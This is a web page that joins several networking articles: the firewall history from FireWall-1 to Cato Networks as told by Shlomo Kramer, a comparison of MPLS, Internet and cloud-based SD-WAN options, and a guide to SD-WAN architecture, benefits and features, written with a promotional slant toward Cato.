SDWaaS uses a “thin-edge” architecture to do this. This is a zero-touch appliance at the branch that simply moves packets across secure tunnels into the SD-WAN cloud, MPLS or other transport. The thin-edge performs only the tasks that must be done locally. These include optimal PoP selection, bandwidth management, packet loss elimination and dual transport management. This means that the edge can run in many different devices and services, such as a software client for mobile devices or an IPsec tunnel from third-party firewalls or cloud services.

But beyond the SD-WAN, most edge functions needed to support the branch perimeter are built into SDWaaS. A complete, converged security stack includes NGFW, IPS, and SGW. SD-WAN and network optimization also run in the cloud including routing, optimal path selection and execute throughput maximization algorithms. And by moving these functions into the cloud, they're available to secure and improve the experience of users in all SD-WAN nodes -- headquarters, remote branch offices, homeworkers, and, yes, mobile users.

At the Branch, Think SDWaaS, Not MPLS

Simplifying infrastructure is a key to thriving in our data-intensive, cloud-based and highly mobile world. A single network with a single framework for all users and applications makes IT leaner, more agile. It will include all branch offices, large and small, a big change from their traditional second-class status.

Converging networking and security is essential to the story of WAN transformation. And while SD-WAN is a valuable evolution of today’s WAN, SDWaaS goes further and brings a new vision for networking and security to today’s branch offices.

  • Hits: 15657

Check Point Software and Cato Networks Co-Founder Shlomo Kramer Shares His Journey: From ‘Firewall-1’ Software to Today’s Firewall as a Service

shlomo kramer cato networks founderBy: Shlomo Kramer, Check Point Software & Cato Networks Co-Founder

As one of the founders of Check Point Software and more recently Cato Networks, I’m often asked for my opinion on the future of IT in general, and security and networking in particular. Invariably the conversation will shift towards a new networking technology or the response to the latest security threat. In truth, I think the future of firewall lays in solving an issue we started to address in the past.

FireWall-1, the name of Check Point’s flagship firewall, is a curious name for a product. The product that’s become synonymous with firewalls wasn’t the first firewall. The category already existed when I invented the name and saved that first project file (A Yacc grammar file for the stateful inspection compiler, if you must know.) In fact, one of the first things Gil did when we started our market research for Check Point in 1992 was to subscribe to a newly formed firewall-mailing-list for, well, firewall administrators.

But FireWall-1 was the first firewall to make network security simple. It’s the stroke of simplicity that made FireWall-1. From software to appliances, firewall evolution has largely been catalyzed by simplicity. It’s this same dynamic that three years ago propelled Gur Shatz and me to start Cato Network and capitalize on the next firewall age, the shift to the cloud.

To better understand why simplicity is so instrumental, join me on a personal 25-year journey of the firewall. You’ll learn some little-known security trivia and develop a better picture of where the firewall, and your security infrastructure, is headed.

The Software Age & Simplicity Revolution

When we started developing FireWall-1, the existing firewalls were complicated beasts. Solutions, such as Raptor Firewall or Trusted Information Systems Firewall Toolkit (FWTK) relied on heavy professional services. Both came out of corporate America (If I remember correctly Raptor from DuPont and FWTK from Digital).

The products required on going attention. Using new internet applications could mean installing a new proxy server on the firewall. Upgrading an existing application could require simultaneously upgrading the existing proxy servers, or risk breaking the application. No surprise, the solutions were sold to large organizations willing to pay for the extensive customization and professional services required to implement and maintain them.

They say “necessity is the mother of invention” and that was certainly the case for Gil, Marius, and I. We were anything but corporate America. Extensive on-site support, custom implementations, professional services — the normative models wouldn’t work for us sitting in my grandmother’s apartment 10,000 miles away from the market, suffering the sweltering Israeli summer with no air conditioning and only $300,000 in the company bank account.

We needed a different strategy. What we needed was a solution that would be:

  • Simple to use without customer support,
  • Simple to deploy without professional services,
  • Simple to buy from a far, and, above all,
  • Simple enough for three capable developers to build before running out of budget (about 12 months).

To make the firewall simple to use, two elements were key:

  • A stateful and universal inspection machine that could handle any application given the right, light-weight configuration file. No longer was there a need to deploy and update custom proxy servers for each application. In the coming years, when Internet traffic patterns changed to include an ever growing number of applications, stateful inspection became critical.
  • An intuitive graphical user interface that any sys admin could understand and use almost immediately.

Actually, we didn’t get the UI right the first time around. After a few months of development, we ran a "focus group” with friends that luckily were PC developers. During those days, PC developers were much more advanced UI folk than us Sun Workstation guys. Our focus group hated the UI, which led us to start all over, and develop a PC-like interface that looked like this:

 checkpoint firewall 1 rule base editor

Caption: A screenshot of FireWall-1’s early interface.

 I still think it’s pretty great. By the way, you might notice a host called “Monk” in the rule base. It was one of the two Sun workstations we owned (actually borrowed as a favor from the Israeli distributor of Sun), and named Monk after Thelonious Monk, the American jazz pianist and composer. The other machine was named Dylan. And all of those cool Icons? They were drawn by Marius who doubled as our graphic artist. He worked on a PC.

To make the product simple to deploy, we made a special effort to compress the entire distribution into a single diskette with the install manual printed on the diskette’s label:

 checkpoint firewall-1 solaris fdd

Caption: An early FireWall-1 disk. Note the installation instructions on the label.

The last critical point was making the product simple to buy. In a world where the competition sold direct and made a considerable part of their revenues off of professional services, we decided to become a pure channel company and sell exclusively through partners.

We were very lucky to sign up early on with SunSoft, the software arm of the then leading computer manufacturer, Sun Microsystems, and become part of their popular Solstice suite. Sun's distribution know-how and capabilities were critical in the early days. In the pull market that followed, the fact that buying FW-1 through our partners was simple became critical.

 checkpoint firewall-1 solstice

Caption: An early FireWall-1 disk packaged as part of Sun’s Solstice suite

The Appliance Age: Simplicity At Scale

As firewalls became increasingly popular, the workstation form factor became increasingly difficult to maintain. The basic premises of our business — simple to buy, simple to deploy simple to use — were eroding because of how customers were using the product. It's one thing when you have a single Internet control point running on a repurposed workstation, but now organizations had distributed hundreds of these firewalls running on all sorts of machines and operating systems. You can imagine the mess.

Moving from shrink-wrapped software to prepackaged appliances seemed like, well, a simple, logical next step. The transition was anything but simple.

There was an existing, perimeter appliance already in the market — the router. It made perfect sense to embed the firewall in that appliance, at least that's what I thought when I signed an OEM agreement with Wellfleet Communications, the then number two router company (after Cisco, of course). We even had a customer with an amazing 300-node purchase (a large Fl in NY). One of our leading engineers, Nir Zuk, relocated to Boston to work at the Wellfleet office and support that project.

 Embedding check point firewall-1 in a Welfleet router

Caption: Embedding the firewall in a Welfleet router was good in concept but the remained crippled by limitations of the underlying router.

I remember the day I visited Nir. He wasn't happy at all, spitting and cursing as only Nir can. The hardware and operating system underlying the Wellfleet router were not strong enough nor dynamic enough to address the needs of a sophisticated firewall. It was a far cry from developing for the Solaris-based workstation. Work progressed slowly and, in the end, Nir was talented enough to get something basic working, enabling us to implement the 300 router- firewall nodes purchased by the customer. But the product remained crippled by the underlying platform. Overall, the product wasn't a success.

It became clear that there was a need for a dedicated appliance, and so we started looking around for a platform flexible enough to run a firewall. One of the early platforms we targeted was an appliance from a company called Armon, who ran a network monitoring solution based on the RMON standard.

Since the appliance was built to run sophisticated software we believed it will be a good match for FW-1. The Armon CEO, Yigal Yaakobi, was a big enthusiast of the OEM model, and licensed the box to us to build a dedicated firewall appliance. But Armon was just bought by SynOptics Communications, the then leading wiring hub manufacturer, who merged with Wellfleet to form Bay Networks. We needed Bay Networks management buy-in, which meant meeting with Jim Goetz, later the famed investor with Sequoia.

Yigal and I dressed up in our best, and in my case the only, suit and met Jim at a café shop in Vegas across from the Interop show. The meeting was not a success. Apparently, Jim did not appreciate my style in clothing and spent most of the meeting scolding it. And so the future of the firewall suffered a minor setback due to my lack of fashion sense. But the idea apparently stuck, because we will soon meet Jim in a more fortunate circumstance.

Embedding the firewall-1 in Nokia appliances nokia ip1220 

Caption: Embedding the firewall in Nokia appliances (pictured is a Nokia IP1220) proved successful.

Anyway, I did not give up. I hired Asheem Chandna (later the famed investor with Greylock) as the vice president of business development and product management, and relocated Nir Zuk to the Bay Area. The two started, among other things, the OEM program for Check Point that yielded the very successful Nokia relationship, which for many years was the basis of Check Point’s line of appliances.

As an epilog, Nir, Jim and Asheem started a company few years later called Palo Alto Networks that redefined the network security market, introducing the first modern unified threat protection appliance. And, yes, it was simple to buy, deploy and use, and wonderfully addressed the challenges of the changing traffic patterns it needed to protect.

 Palo Alto redefined the network security market with unified threat protection appliances  pa-7000

Caption: Palo Alto redefined the network security market with unified threat protection appliances (shown here is a PA-7000 series appliance)

The Cloud Service: Simplicity For Today’s Business

Firewalls were always in the business of defining the perimeter, but originally we had ambitions to go after the business of the WAN. At Check Point we developed VPN-1 immediately after releasing FireWall-1 (and then merged them into one product suite), the first IPsec-based VPN between gateways and later a client VPN version as well for remote users. The idea was to replace Frame Relay and ATM, the predecessors of MPLS.

 VPN-1 disk for running on a Nokia appliance

Caption: An early VPN-1 disk for running on a Nokia appliance

Then we developed FloodGate-1 to provide WAN optimization and QOS for the IP VPN network. The goal was to create a platform for a high-quality, Internet-based WAN that did not require dedicated, expensive, Frame Relay, or ATM connections and would extend beyond physical locations to any type of nomadic (if we use the ‘90s term) user.

It failed. MPLS won. People wanted SLA-backed networks to run their mission-critical apps. The Internet was too unpredictable. That was my exit project at Check Point. After I left, the FloodGate-1 effort was sidelined.

I also put this problem aside and started working on bringing firewalls deep into the datacenter of organizations. That took about 12 years and yielded other companies called Imperva and then Incapsula, founded by Gur Shatz, who soon emerged as a true cloud innovator.

In Incapsula, for the first time, the appliance form factor came under attack. The datacenter was by now mostly hosted on a cloud service or even just a good, old, plain hoster. Physical appliances made little sense when you could use a third-party cloud service. Incapsula was a great success (still is) because it took application delivery and security, and matched the cloud challenge with a cloud toolset.

While we were busy with the datacenter firewall it became increasingly clear that the perimeter was dissolving. In a world where most of my apps are third-party Software as a Service (SaaS), most of my data resides on third-party, public clouds, and most of my work is done on mobile devices out of the office, of what use are physical appliances when they’re guarding my now largely empty office?

Organizations had to buy increasing number of products for protecting their SaaS applications, Infrastructure as a Service (IaaS) cloud datacenters, and mobile users on top of their ongoing firewall spend. To make things worse, lots of branch locations and small offices that never had a direct breakout to the Internet but just backhaul over MPLS to company center where the firewall resided could not do that anymore. The Internet became a utility. You needed it anywhere, anytime, lots of it and in a secure way. So, all sort of patches like MPLS augmentation and secure web gateways emerged to increase Internet availability to all elements of the organization. Things were very messy at this stage. A far cry from the simple to buy, deploy, and use idea of the past.

 With cloud, you can create one network with one set of security policies for all locations, resources, and users

Caption: With cloud, you can create one network with one set of security policies for all locations, resources, and users

When Gur (yep, that guy from Incapsula fame) and I started Cato Networks almost three years ago we realized the problem of WAN and perimeter are interlocked and require a new architecture that will make secure Internet and WAN available everywhere, anytime to any part of the organization – a branch office, a data center, a cloud segment, a mobile user. It was like going back 17 years in time to the days of VPN-1 and Floodgate-1 and taking a round two at that problem, but this time in a completely different world driven by cloud and mobility. The key remained the same: bring simplicity to an increasingly complex world.

 Cato networks offer a diverse range of SD-WAN use cases

Caption: Cato addresses a diverse range of use cases.

Following the Incapsula playbook we built a cloud network able to deliver anytime anywhere networking and security services. Think AWS for networking and network security. I believe this is the architecture that 10 years from now will dominate the enterprise WAN.

But it’s not just my belief. After 18 months in the market, hundreds of customers with thousands of branch locations across all verticals now rely on Cato Cloud to connect and secure their corporate networks. They agree with us: Cato is the future of networking.

  • Hits: 22574

MPLS vs. SD-WAN vs. Internet vs. Cloud Network. Connectivity, Optimization and Security Options for the ‘Next Generation WAN’

sdwan networksThe Wide Area Network (WAN) is the backbone of the business. It ties together the remote locations, headquarters and data centers into an integrated network. Yet, the role of the WAN has evolved in recent years. Beyond physical locations, we now need to provide optimized and secure access to Cloud-based resources for a global and mobile workforce. The existing WAN optimization and security solutions, designed for physical locations and point-to-point architectures, are stretched to support this transformation.

This article discusses the different connectivity, optimization and security options for the ‘Next Generation WAN’ (NG-WAN). The NG-WAN calls for a new architecture to extend the WAN to incorporate the dynamics of cloud and mobility, where the traditional network perimeter is all but gone.

The Wide Area Network (WAN) connects all business locations into a single operating network. Traditionally, WAN design had to consider the secure connectivity of remote offices to a headquarters or a data center which hosted the enterprise applications and databases.

Without further delay, let's take a look at the topics cover in this article:

Let’s look at evolution of the WAN.

First Generation: Legacy WAN Connectivity

Currently, there are 2 WAN connectivity options which offer a basic tradeoff between cost, availability and latency:

Option 1: MPLS - SLA-Backed Service at Premium Price

With MPLS, a telecommunication provider provisions two or more business locations with a managed connection and routes traffic between these locations over their private backbone. In theory, since the traffic does not traverse the internet, encryption is optional. Because the connection is managed by the telco, end to end, it can commit to availability and latency SLAs. This commitment is expensive and is priced by bandwidth. Enterprises choose MPLS if they need to support applications with stringent up-time requirements and minimal quality of service (such as Voice over IP (VOIP).

hq connection to remote office via mpls

Headquarters connecting to remote offices via MPLS Premium service

To maximize the usage of MPLS links, WAN optimization equipment is deployed at each end of the line, to prioritize and reduce different types of application traffic. The effectiveness of such optimizations is protocol and application specific (for example, compressed streams benefit less from WAN optimization).

Positives:

  • Latency: Low
  • Availability: High

Concerns:

  • Price: High

Option 2: Internet - Best Effort Service at a Discounted Price

Internet connection procured from the ISP, typically offers nearly unlimited last mile capacity for a low monthly price. An unmanaged internet connection doesn’t have the high availability and low-latency benefits of MPLS but it is inexpensive and quick to deploy. IT establishes an encrypted VPN tunnel between the branch office firewall and the headquarters/data center firewall. The connection itself is going through the internet, with no guarantee of service levels because it is not possible to control the number of carriers or the number of hops a packet has to cross. This can cause unpredictable application behavior due to increased latency and packet loss.

Internet-based connectivity forces customers to deploy and manage branch office security equipment.

Positives:

  • Price: Low

Concerns:

Latency: Unknown

Availability: Low

Second Generation: Appliance-Based SD-WAN

The cost/performance tradeoff between internet and MPLS, gave rise to SD-WAN. SD-WAN is using both MPLS and internet links to handle WAN traffic. Latency sensitive apps are using the MPLS links, while the rest of the traffic is using the internet link. The challenge customers face is to dynamically assign application traffic to the appropriate link.

Readers interested in SD-WANs should read our Complete Guide to SD-WAN article.

Related articles:

SD-WAN: Augmenting MPLS with Internet Links

SD-WAN solutions offer the management capabilities to direct the relevant traffic according to its required class of service, offloading MPLS links and delaying the need to upgrade capacity.

sdwan combining mpls with internet links

SD-WAN solutions, however, are limited in a few key aspects:

SD-WAN Footprint

Similar to WAN optimization equipment, SD-WAN solutions must have a box deployed at each side of the link.

Connectivity

SD-WAN can’t replace the MPLS link because its internet “leg” is exposed to the unpredictable nature of an unmanaged internet connection (namely, its unpredictable latency, packet drops and availability).

Deployment

SD-WAN, like the other WAN connectivity options, is agnostic to the increased role of internet, Cloud and mobility within the enterprise network. It focuses, for the most part on optimizing the legacy, physical WAN.

Third Generation: A Cloud-based, Secure SD-WAN

With the rapid migration to Cloud applications (e.g., Office 365), Cloud infrastructure (e.g. Amazon AWS) and a mobile workforce, the classic WAN architecture is severely challenged. It is no longer sufficient to think in terms of physical locations being the heart of the business, and a new cloud-based SD-WAN solution was born. Here is why:

Limited end to end link control for the Cloud

With public cloud applications outside the control of IT, organizations can’t rely on optimizations that require a box at both ends of each link. In addition, Cloud infrastructure (servers and storage), introduces a new production environment that has its own connectivity and security requirements. Existing WAN and Security solutions don’t naturally extend to the new Cloud-based environments.

Limited service and control to mobile users

Securely accessing corporate resources requires, mobile users to connect to a branch or HQ firewall VPN which could be very far from their location. This causes user experience issues, and encourages compliance violations (for example, direct access to Cloud services that bypasses corporate security policy). Ultimately, the mobile workforce is not effectively covered by the WAN.

The Cloud-based, Secure SD-WAN is aiming to address these challenges. It is based on the following principles:

The Perimeter Moves to the Cloud

The notorious dissolving perimeter is re-established in the Cloud. The Cloud delivers a managed WAN backbone with reduced latency and optimal routing. This ensures the required quality of service for both internal and Cloud-based applications.

The Cloud-Βased WAN is “Democratic” and All-Inclusive

All network elements plug into the Cloud WAN with secure tunnels including physical locations, Cloud resources and mobile users. This ensures all business elements are integral part of the network instead of being bolted on top of a legacy architecture.

Security is Ιntegrated into the Νetwork

Beyond securing the backbone itself, it is possible to directly secure all traffic (WAN and internet) that crosses the perimeter - without deploying distributed firewalls.

sdwan protects businesses from internet attacks

As shown in the example above, the SD-WAN provider acts as a gateway to the internet for the business. Any attempts to gain access to the business network or attacks must pass through the SD-WAN provider's secure network. This not only provides increased levels of security but also off-loads attacks directly to the SD-WAN provider, saving the business considerable bandwidth and resources needed to repel attacks.

Summary

This article compared SD-WAN solutions with Service Provider MPLS, Internet and Cloud Networks. We examined the positive and negative offerings of MPLS services (guaranteed SLAs), Internet-based WAN solutions (best-effort service), augmenting MPLS with Internet links and Cloud networks.  For more information on SD-WAN, refer to our Complete Guide to SD-WAN networks.

  • Hits: 34343

Complete Guide to SD-WAN. Technology Benefits, SD-WAN Security, Management, Mobility, VPNs, Architecture & Comparison with Traditional WANs. SD-WAN Providers Feature Checklist.

SDWAN Global Secure NetworkSD-WAN is the answer for enterprises and organizations seeking to consolidate network functions and services while at the same time simplify their WAN infrastructure and its management.

SD-WANs are suitable for any organization regardless of their size and location(s). Forget about managing routers, firewalls or proxies, upgrading internet lines, high-cost WAN links, leased lines (MPLS), filtering incoming traffic, public-facing infrastructure, VPNs and mobile clients. SD-WANs provide all the above and allow managers, administrators and IT staff to manage their WAN infrastructure via an intuitive, easy-to-use GUI interface, lowering equipment and service contract costs but also minimize the need for continuous upgrades and other expensive and time-consuming exercises.

Related articles:

The diagram below clearly shows a few of the network and security services leading global SD-WAN providers such as  CATO Networks provide to businesses no matter where they are geographically located around the world.

 sdwan network services

SD-WAN Networks offer zero-touch deployment with advanced network security services

Let’s kick-off this guide by taking a look at the SD-WAN topics covered:

What is SD-WAN?

Software-Defined Wide Area Network (SD-WAN) is a new architectural approach to building Wide Area Networks (WANs) whereby applications and the network configuration are isolated from the underlying networking services (various types of Internet access or private data services sold by network service providers). As a result, the networking services can be reconfigured, added, or removed without impacting the network. The benefits to such an approach address long-standing concerns with traditional WANs around the cost of bandwidth, time to deploy and reconfigure the WAN and more.

The Problem with Traditional WANs

For years, organizations connected their locations with private data services, namely MultiProtocol Label Switching (MPLS) services. Companies contract with their network service provider to place MPLS routers at each location. Those routers connect with one another or a designated site across the MPLS service. MPLS services are seen as being:

  • Private because all customer traffic is separated from one another.
  • Predictable as the MPLS network is engineered to have very low packet loss
  • Reliable as the carrier stands behind the MPLS with service and support, backing it up contractually with uptime (and reliability) guarantees.

 Traditional High-Cost MPLS VPN Networks

Traditional High-Cost MPLS VPN Networks

As such, MPLS services are expensive (relative to Internet connectivity), in some cases costing 90 percent more than Internet bandwidth. And with bandwidth being so expensive, companies have to be very judicious in their bandwidth usage. Sites are often connected by single MPLS line, creating a potential single point of failure. Delays from line upgrades are a problem, as lines often lack the necessary excess capacity to accommodate traffic changes or new applications. Finally, new deployments take significantly longer than Internet lines — weeks in some cases, months at the extreme — whereas Internet access can be deployed in days if not minutes (with 4G/LTE).

Organizations accepted MPLS limitations for years for numerous reasons. For too long, the Internet was far too erratic to provide the consistent performance needed by enterprise applications. That’s changed significantly within Internet regions over the past few years. A decade ago, most enterprise traffic stayed on the MPLS network, terminating at a headquarters or datacenter housing the company’s applications. Today, Internet and cloud traffic are the norm not the exception, often constituting half of the traffic on and MPLS backbone. The net result is that data transmission costs end up consuming a significant portion of an IT Department’s annual expenditure on its WAN with Internet- and cloud-traffic being a major cause.

How Does SD-WAN Work?

Enter SD-WAN. SD-WAN leverages ubiquitous, inexpensive Internet connections to replace MPLS for much of an organization’s traffic. At a high-level, the SD-WAN separates the applications from the underlying network services. Policies, intelligent routing algorithms, and other technologies in the SD-WAN adapt the network to the application. Depending on implementation, the locations, cloud datacenters, SaaS applications, and mobile users can all be connected into the SD-WAN.

 High-Speed Low-Cost SD-WAN with Global SLA Contracts (CATONetworks)

High-Speed Low-Cost SD-WAN with Global SLA Contracts

More specifically, the SD-WAN router sits at the edge of a location’s local network and connects to the network services. Best practices call for at least two connections per location. Hybrid WAN configurations will use an MPLS line and an Internet service, such as fiber, xDSL, cable or 4G/LTE. All-Internet configurations will use two or more Internet service. The SD-WAN routers connect with one another, forming a mesh of encrypted tunnels (the “virtual overlay”) across the underlying network services (the “underlay”), such as cable, xDSL, or 4G/LTE.

Unlike traditional WANs, all lines in an SD-WAN are typically active. The SD-WAN uses Policy-Based Routing (PBR) algorithms and preconfigured application policies to dynamically select the optimum tunnel based on application requirements, business priorities, and real-time network conditions. The SD-WAN is responsible for balancing traffic across the site’s connections. Should there be an outage (a “blackout”) or degradation in the line (a “brownout”), the SD-WAN moves traffic to alternate paths and restores them to initial paths also based on configured policies.

 sdwan line redundancy policy based routing

SD-WAN providing alternative connectivity paths during critical line failures

As a result, SD-WAN helps us align our WANs to our business priorities. We can provide every location, user, or resource with just the right available connectivity configured with the just the right amount of resiliency. Business-critical locations, such as a Data Center, can be connected by MPLS and two active, dual-homed connections. Small offices where MPLS may not be available can be connected with one line. Disaster response teams, and other ad-hoc groups, can use 4G/LTE.

Yet despite the configuration, all sites continue to be managed by the same set of security policies and routing rules with the same orchestration engine and from the same management console. In short, we extract maximum value from the underlying WAN resource for optimum Return On Investment (ROI).

SD-WAN Benefits

More specifically, SD-WAN brings benefits to the organization in terms of performance, cost savings, agility, and availability.

SD-WAN Application Performance

Applications have very different networking requirements when it comes to the WAN. Voice is susceptible to jitter and packet loss; bulk data transfers require lots of bandwidth (throughput, actually). Internet routing doesn’t respect those differences. Route selection reflect economic realities between ISPs not application requirements. Internet providers will dump packets on peered networks or keep packets on their own network even though there are “better” routes available.

SD-WAN lets organizations be smarter in how they route traffic. Policies describe the latency, loss and jitter tolerances of various applications. The SD-WAN routers monitor latency, and loss metrics of their connections. They then use that information and the preconfigured policies to select the optimum path for each application.

SD-WAN Cost Savings and Avoidance

Software-Defined Networking (SDN) benefits may still need to be realized in the Data Centers, but they’re very apparent when SDN is applied to the WAN. The ROI of SD-WAN can be dramatic. Internet bandwidth can cost 70 percent less than MPLS bandwidth depending on region and location.

Operational costs are also reduced. Traditional WANs require advanced engineering and mastering of arcane protocols. SD-WANs do not completely eliminate for that experience by any means. But they do help maximize engineering resources by simplifying deployment and management of branch offices. Policy-driven configuration minimizes the amount of “configuration-drift” between branch offices, complicating WAN support. Adding new application services across the WAN without adversely existing services becomes much far easier. Availability requirements can be more readily met.

SD-WAN architectures that include advanced security further improve savings. They eliminate security appliances, saving on the costs related to the upgrading, patching, and maintenance of those appliances.

SD-WAN Availability

The availability of traditional WAN was more often than not determined by the uptime of the last mile. Within the core of the network, service provider have plenty of redundancy. It’s in the connection to the remote site where redundancy is more limited.

Many locations will not have redundant connections. Even if there are redundant connection there’s no guarantee that the physical cabling is fully redundant. The different services may still share some common ducting and cabling, opening the way for a discontinuation of service due to a backhoe severing a line or some other physical plant failure. Running two active connections complicates network engineering. And in the event of a blackout on one connection, failover is rarely fast enough to sustain a session or voice call, for example.

SD-WANs natively improve the availability of locations. Their use of active/active connections builds redundancy into the WAN. By mixing different types of WANs, such as 4G/LTE and fiber, diverse routing becomes easier to guarantee. Should there be a blackout or a brownout, the SD-WAN router automatically switches traffic to the second connection. Depending on implementation, failover can be fast enough to sustain a session; users never realize there’s been a networking issue or link failure.

Agility: Deploying new Sites, Reconfiguring the WAN

SD-WAN allows organizations to respond faster to business conditions. This gets expressed in different ways. Businesses often need to start operations at remote sites quickly or, at least, without extensive delays. Enterprise IT is challenged with deploying networking services and configuring security at remote locations. SD-WAN addresses these problems on several fronts:

Deploying new sites: While provisioning MPLS circuits alone can take up to 90 days, more for high-speed circuits, the Internet circuits used by SD-WAN can be deployed in days, less when considering 4G/LTE connections. While MPLS often required on-site expertise to configure networking equipment, SD-WAN avoids those delays with zero-touch provisioning.

Reconfiguring the WAN: Traditional WAN architectures required the network service provider to change the network, which introduced further delays. If more bandwidth was required at a new location, the service provider had to re-provision the line all of which led to more delay. No wonder Gartner found enterprises to be “...dissatisfied with large incumbent network service providers.” SD-WAN puts the enterprises in control of network provisioning. The use of “fatter” Internet pipes means line provisioning is generally not required.

SD-WAN Architecture

There are two basic SD-WAN architectures, edge appliances and cloud-based SD-WAN. Both edge appliances and cloud-based SD-WAN involve a controller function for pushing out policies and distributing routing information and a management console for dashboard, reporting and policy configuration. Where they differ is in the location of the virtual overlay and how they provide advanced services.

SD-WAN Architecture - Edge Appliances

With edge appliances, the SD-WAN virtual overlay stretches from location to location. Appliances are installed at each site and, once connected to the Internet, retrieve configuration profiles from the SD-WAN controller. The SD-WAN devices configure themselves and joining or construct a virtual overlay with other devices. Each device runs the policy-based routing algorithms needed to steer traffic to the most appropriate link based on application requirements and underlying link quality.

Edge appliance architectures are very familiar to network engineers. It’s been the approach used for years by router vendors, WAN optimization vendors, and more. The approach brings certain known benefits namely:

  • Incremental WAN evolution — SD-WAN edge appliances integrate with existing enterprise networking and security infrastructure while making the WAN more agile.
  • Transport independence — Edge appliance architectures give customers maximum freedom in choosing network service providers.

At the same time, edge appliance architectures introduce several constraints into the SD-WAN such as:

  • Limited ability to improve Internet performance — SD-WAN edge appliances cannot control the end-to-end routing across the Internet. As such, they remain dependent on MPLS to deliver latency- and loss-sensitive applications, particularly across global connections.
  • Unable to evolve WAN functionality — The limited capacity of the SD-WAN edge appliance restricts the overlay's capabilities. Advanced security functions, such as decrypting traffic or running extensive rule sets, consume significant resources. Taking full advantage of these features forces an unexpected hardware upgrade. It's the same problem that had long limited the use of unified threat management (UTM) appliances.
  • Overly site focused — Appliances are well suited for connecting locations, but they do not naturally extend to support cloud datacenters, SaaS applications, and mobile users. There’s no easy way to place an SD-WAN appliance in the cloud. Mobile users are rarely happy with the poor performance that results when having to connect back to an appliance that could be very far away, particularly when traveling.

SD-WAN Architecture - Cloud-Based SD-WAN

With Cloud-based SD-WAN, the virtual overlay is formed between the points of presence (PoPs) of the Cloud SD-WAN service. The PoPs connect to each other across a privately managed backbone. There are appliances at each location, but in contrast to edge architecture, Cloud-based SD-WAN appliance run “just enough” functionality to send traffic to the nearest PoP. Software in the PoP applies the necessary security and network optimizations before forwarding the traffic along the optimum path to its destination.

Cloud-based SD-WAN is a new approach to networking, but very familiar one to any IT person. It's the same approach used by AWS, Azure and countless other cloud providers. The architectural benefits include:

  • Thin edge flexibility — Since the edge appliance needs minimal functionality, the software can be implemented across a wider range of endpoints. Client software, for example, can connect mobile devices into the SD-WAN. The same is true for cloud applications and cloud datacenters.
  • Enhanced functionality — By leveraging the resources of the cloud, cloud-based SD-WAN can deliver a broad range of advanced functionality without facing scaling constraints. Network throughput is also be improved by carrying traffic over a private, cloud backbone and not the public internet.

At the same time, cloud-based SD-WAN architectures face several constraints including:

  • Education — Converging networking, security, and mobility into the cloud represents a radical transformation in networking. It may require some training for IT professionals to grasp the full implications of the evolution.
  • Service Delivery — Cloud-based SD-WAN should be manageable by the customer to avoid the delays and per-task-pricing associated with managed service offerings from carriers and traditional network service providers.
  • Geographic Footprint — The effectiveness of Cloud-based SD-WAN services rides on the reach of its network. Without a global network, a Cloud-based SD-WAN service cannot fix the Internet’s consistency, latency and packet loss problems, problems that are particularly prevalent between Internet regions.

Cloud-based SD-WAN is fundamentally different from two other similar sounding solutions (see table):

  • Cloud-managed services host the management/orchestration engine in the cloud. The SD-WAN fabric is still constructed from an edge appliance architecture.
  • Cloud-hosted services (also called “cloud-delivered”) move some SD-WAN functionality to the cloud. In addition to running the management/orchestration engine in the cloud, some shared infrastructure among customers, such as gateways to cloud services, will run in the cloud. The SD-WAN fabric continues to be constructed edge-to-edge by edge appliances (and gateways).

By contrast, Cloud-based SD-WAN services move the management/orchestration engine, and the SD-WAN fabric into the cloud. Edge appliances (or mobile client software) only implement the critical edge functions to connect to the SD-WAN fabric in the cloud. As such, the shared infrastructure includes not only the gateways on a cloud-hosted service but also full SD-WAN software and the middle-mile transport connecting the POPs.

CLOUD SD-WAN SERVICES COMPARED

 

Location of Management /

Orchestration Engine

Location of Virtual Overlay

Use of Shared

Infrastructure

Cloud-Managed Services

Cloud

Appliances

 None

Cloud-Hosted Services

Cloud

Appliances

 Partial

Cloud-based Services

Cloud

Cloud

 Full

SD-WAN Deployment Methods

As we’ve seen, organizations can deploy SD-WANs themselves using SD-WAN edge appliances, in what’s sometimes referred to as “Do It Yourself” (DIY) deployments, and cloud-based SD-WANs

In addition to the two primary SD-WAN architectures, service providers offer managed SD-WAN services. As with any managed IT services, managed SD-WAN services repackage vendor’s SD-WAN technology (typically an SD-WAN edge appliance, but not necessarily), with the service providers implementation expertise.

With managed SD-WAN services, organizations rely on the service provider to maintain and run the SD-WAN. As such, there are several service-specific features to consider including:

Service Level Agreements (SLAs) governing all aspects of the service. SLAs should include a detailed description, specify the time needed to make any moves, adds, or changes (MACs) to the SD-WAN. Penalties should be specified as well.

Service and Support - A detailed description of support levels should be provided including escalation procedures and any agreements around time to repair.

Delivery Timeline - A clear project and delivery timeline should be specified with the SD-WAN roll out.

SD-WAN Must-Have Features

There are many features to consider when selecting an SD-WAN edge appliance or cloud-based SD-WAN architecture. The following are the minimum criteria for an SD-WAN:

Endpoints — The SD-WAN solution must connect locations to the SD-WAN with a hardware appliance or software, such as a virtual appliance or a VNF. The SD-WAN solution should also connect other types of resources, namely cloud datacenters (IaaS), cloud applications (SaaS), and mobile users.

Encrypted overlay —-The SD-WAN must establish a secure, virtual overlay across network services. All traffic across that overlay must be encrypted. The overlay must be policy-driven.

Data service independence —- The SD-WAN must connect locations with major types of Internet data services, such as fiber, xDSL, cable, and 4G/LTE, and MPLS, for hybrid deployments.

Application policies — The SD-WAN must provide configurable policies describing application characteristics, such as failover options and the minimum and maximum thresholds for latency, loss, and jitter.

Real-time line monitoring — The SD-WAN appliances must able to gather real-time latency and packet loss statistics of the attached lines.

Policy-based routing — The SD-WAN must implement algorithms that can select the optimum route for a given application based on configured application policies and real-time line statistics.

Recommended SD-WAN Security & VPN Features

While it’s not a definitional requirement, the SD-WAN solution should include advanced security services. All SD-WAN providers claim to deliver a “secure SD-WAN” but that only refers to traffic protection. Organizations still need to protect against data exfiltration, malware infection, and other advanced security threats, which requires advanced security technologies such as Next-Generation Firewall (NGFW), Secure Web Gateway (SWG), and advanced threat protection.

 internet attacks to wan infrastructure

Companies are forced to deal with internet & malware attacks to their infrastructure

Ideally, the SD-WAN will be converged with the advanced security services. With security and networking converged together, deployment becomes much simpler, capital costs drop, and operationally, the SD-WAN and security infrastructure are easier to maintain than with separate security and networking devices. But if converged security is not possible, at the very least the SD-WAN provider should offer service chaining/insertion to integrate with external third-party security services.

 sd-wan provider blocks internet attacks

SD-WAN providers block all malicious traffic/attacks at the Cloud level

